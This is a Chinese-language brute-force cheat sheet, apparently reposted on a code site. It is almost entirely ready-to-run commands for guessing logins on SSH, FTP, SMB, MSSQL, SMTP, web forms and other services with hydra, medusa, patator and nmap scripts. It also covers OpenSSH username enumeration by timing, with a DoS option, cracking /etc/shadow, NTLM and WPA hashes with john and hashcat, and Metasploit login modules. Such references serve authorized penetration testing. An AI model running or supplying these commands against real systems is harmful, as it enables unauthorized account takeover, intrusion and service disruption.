暴力破解


 

SMB: 

enum -D -u administrator -f passwords.txt 服務器名

FTP 

medusa -H ip.txt -U user.txt -P passwd.txt -M ftp

hydra -l 用戶名 -P 密碼字典 -e ns -vV IP ftp

hydra -L user.txt -P pass.txt -F ftp://127.0.0.1:21 

 

破解ssh
hydra -L user.txt -P pass.txt -F ssh://127.0.0.1:22
patator ssh_login host=127.0.0.1 user=root password=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'

 

hydra

破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak:
# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak

破解smb
# hydra -L user.txt -P pass.txt -F smb://127.0.0.1

 破解MSSQL
 hydra -L user.txt -P pass.txt -F mssql://127.0.0.1:1433

 破解HTTP基礎認證
 # hydra -L user.txt -P pass.txt -F http://127.0.0.1:2048/auth

Web表單登錄破解
get方式提交,破解web登錄:
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
  # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php

post方式提交,破解web登錄(不支持驗證碼)
  hydra -l admin -P pass.lst -o ok.lst -t 1 -f IP http-post-form "/index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>"

  說明:用戶名是admin,密碼字典是pass.lst,破解結果保存在ok.lst,-t 是同時線程數為1,
  -f 是當破解了一個密碼就停止,ip就是目標ip
  http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。
  后面參數是網頁中對應的表單字段的name 屬性,后面<title>中的內容是表示錯誤猜解的返回信息提示,可以自定義

 

 針對 OpenSSH 用戶進行枚舉時序攻擊

注:枚舉時序攻擊(“Enumeration Timing Attack”)屬於側信道攻擊/旁路攻擊(Side Channel Attack),
側信道攻擊是指利用信道外的信息,比如加解密的速度/加解密時芯片引腳的電壓/密文傳輸的流量和途徑等進行攻擊的方式,一個詞形容就是“旁敲側擊”。–
osueta 是一個用於對 OpenSSH 進行時序攻擊的 python2 腳本,其可以利用時序攻擊枚舉 OpenSSH 用戶名,並在一定條件下可以對 OpenSSH 服務器進行 DOS 攻擊。 # https://github.com/c0r3dump3d/osueta $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt

破解

nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.1.4   破解rsync 
nmap --script informix-brute -p 9088 192.168.1.4    informix數據庫破解 
nmap -p 5432 --script pgsql-brute 192.168.1.4      pgsql破解 
nmap -sU --script snmp-brute 192.168.1.4          snmp破解 
nmap -sV --script=telnet-brute 192.168.1.4        telnet破解

枚舉 Samba
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

枚舉 SNMP
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

 

# SMTP  爆破 (patator)

$ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst $ patator smtp_login host=192.168.1.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.1.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.1.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst ­x ignore:fgrep='incorrect password or account name'

 

MD5破解   (:md5.txt文件,沒有saltMD5哈希)

   john -format=raw-md5 -pot=./wordlist.pot  md5.txt

   john -format=raw-md5-opencl  -wordlist=wordlist.lst  -rules:Single  md5.txt   (利用GPU加快破解)

Hash破解

hashcat -m 400 -a 0 hash /root/rockyou.txt  破解hash 

破解linux密碼

john --wordlist=password.lst "/etc/shadow"  #字典模式
john –single "/etc/shadow" #Single模式根據用戶名產生變化來進行猜解
john -i:Digits -user:test1 user1  #遍歷模式,使用組合密碼的所有可能情況
參數:   ALL(0到8個字符長的所有字符組合) Alpha(1到8個字符長的所有字母組合)   Digits(1到8個字符長的所有數字組合) Alnum(1到8個字符長的所有字母
/數字組合) john -show hashes 忘記密碼時可使用類似命令查看已破解的密碼 john --restore hashes 在原來的基礎上繼續破解(破解結果出現問號時)

 

ZIP密碼破解:

(1)fcrackzip爆破 :  fcrackzip -b -l 4-4 -u 1D7.zip -v -c 1
(其中,-b爆破,-l說明密碼長度,-u是文件,-v是詳細輸出,-c是密碼字典類型)

 

oclHashcat

無論是MD5,MSSQL,SHA1還是其他哈希,破解命令都是一條,-m設定哈希類型

破解WPAv2哈希
cudaHashcat-plus64.exe -m 2500 out.hccap 

破解NTLM哈希
cudaHashcat-plus64.exe -m 1000 NTLM.txt path/wordlist.txt 

 

Metasploit中的一些爆破模塊

auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM